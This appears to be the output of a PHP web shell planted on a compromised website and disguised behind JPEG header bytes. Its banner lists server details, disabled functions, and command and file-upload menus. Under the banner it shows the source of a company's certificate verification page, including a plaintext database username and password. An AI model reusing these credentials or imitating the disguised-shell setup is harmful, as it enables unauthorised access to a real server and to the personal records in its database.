����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.145.157.93 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/assets/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<link rel="canonical" href="https://vflyorions.com/contact"/> <meta charset="UTF-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta name="description" content="Connect with our team effortlessly and get the support you need reach out to us for inquiries, assistance, collaborations we're here to help you,to get in touch." /> <meta name="keywords" content="BPO Service in nagpur, BPO voice and non voice, BPO voice In nagpur, BPO non voice in nagpur , BPO voice company in nagpur, BPO non-voice company in nagpur, BPO voice and non voice services, BPO outsorcing, B2B call Center" /> <!-- ======== Page title ============ --> <title>Verification</title> <?php $page = 'Verification'; include 'header.php'; ?> <style> .scroll{ overflow-x: auto; display:block; } hr.new4 { border: 1px solid black; } table th, td{ padding:20px; border:2px solid #f6f5f5; } table{ /*border-left:10px solid #ff5e14;*/ } @media (max-width:767px){ table th, td{ padding: revert-layer !important; } } @media only screen and (max-width: 768px) and (min-width: 100px) { .table-align { flex-direction: column-reverse !important; } } </style> <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/allbanner.png')"> <div class="container"> <div class="row"> <div class="col-12 col-lg-12"> <div class="page-heading text-white"> <h1>Verification</h1> </div> <div class="breadcrumb-wrap"> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.html">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Verification of Certificate</li> </ol> </nav> </div> </div> </div> </div> </div> <div class="contact-us-wrapper section-padding"> <div class="container" style="max-width:1280px !important;"> <div class="row eq-height"> <div class="col-lg-12 col-12"> <div class="contact-form"> <center> <h2>CERTIFICATE VERIFICATION SYSTEM</h2> </center> <div class="row g-5"> <div class="text-center"> <form method="POST" class="form-inline justify-content-center p-2"> <div class="form-group"> <center> <input type="text" required class="form-control cf-field" style="width: 250px; height: 64px; font-size: 18px; text-align:center;" placeholder="Enter Certificate Code" name="code"> </center> </div><br> <input class="submit-btn" type="submit" name="submit" value="Search"> </form> </div> </div> <!--<form method="POST" class="row">--> <!-- <div class="col-md-12 col-12" >--> <!-- <div class="single-personal-info">--> <!-- <input type="text" name="name" style="margin:1px" placeholder="Name" required > --> <!-- </div>--> <!-- </div> --> <!-- <div class="col-md-12 col-12">--> <!-- <input class="submit-btn" type="submit" name="contact" value="Submit Now">--> <!-- </div> --> <!--</form>--> <span class="form-message"></span> </div> </div> </div> </div> <div class="container-fluid mt-5"> <h2 class="text-center">Certificate Result</h2> <div class="container"> <div class="card"> <?php if (isset($_POST['submit'])) { $code = $_POST['code']; // Database connection to second server $servername = "localhost"; $username = "mhmsfzcs_crm"; $password = "Crm@2024@"; $dbname = "mhmsfzcs_crm"; $conn = new mysqli($servername, $username, $password, $dbname); if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } $sql = "SELECT fullname, domain, duration, code, start_date, award_date FROM emp_info WHERE code = ?"; $stmt = $conn->prepare($sql); if ($stmt) { $stmt->bind_param("s", $code); $stmt->execute(); $stmt->bind_result($fullname, $domain, $duration, $certification_no, $starting_date, $award_date); if ($stmt->fetch()) { echo '<table style="width:-webkit-fill-available;" class="table-striped" cellpadding="10" cellspacing="11" border="2px sollid black">'; echo '<tbody>'; echo '<tr style="text-align:center;"><th>Fullname:</th><td>' . htmlspecialchars($fullname) . '</td></tr>'; echo '<tr style="text-align:center;"><th>Domain:</th><td>' . htmlspecialchars($domain) . '</td></tr>'; echo '<tr style="text-align:center;"><th>Duration:</th><td>' . htmlspecialchars($duration) . '</td></tr>'; echo '<tr style="text-align:center;"><th>Certification No:</th><td>' . htmlspecialchars($certification_no) . '</td></tr>'; echo '<tr style="text-align:center;"><th>Starting Date:</th><td>' . htmlspecialchars($starting_date) . '</td></tr>'; echo '<tr style="text-align:center;"><th>Award Date:</th><td>' . htmlspecialchars($award_date) . '</td></tr>'; echo '</tbody>'; echo '</table>'; } else { echo '<div class="alert alert-danger text-center" role="alert">Invalid Certificate Code.</div>'; } $stmt->close(); } else { echo "Error preparing statement: " . $conn->error; } $conn->close(); } ?> </div> </div> </div> </div> <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> <script> $(document).ready(function() { $('#dropdownOptions').change(function() { if ($(this).val() === 'other') { $('#otherOptionInput').show(); } else { $('#otherOptionInput').hide(); } }); }); </script> <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script> <?php if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?> <script> new swal({ title: "<?php echo $_SESSION['status'];?>", //text: "You clicked the button!", icon: "<?php echo $_SESSION['status_code'];?>", button: "OK", }).then(function() { window.location = ""; }); </script> <?php unset($_SESSION['status']); } ?> <?php include 'footer.php'; ?> </html>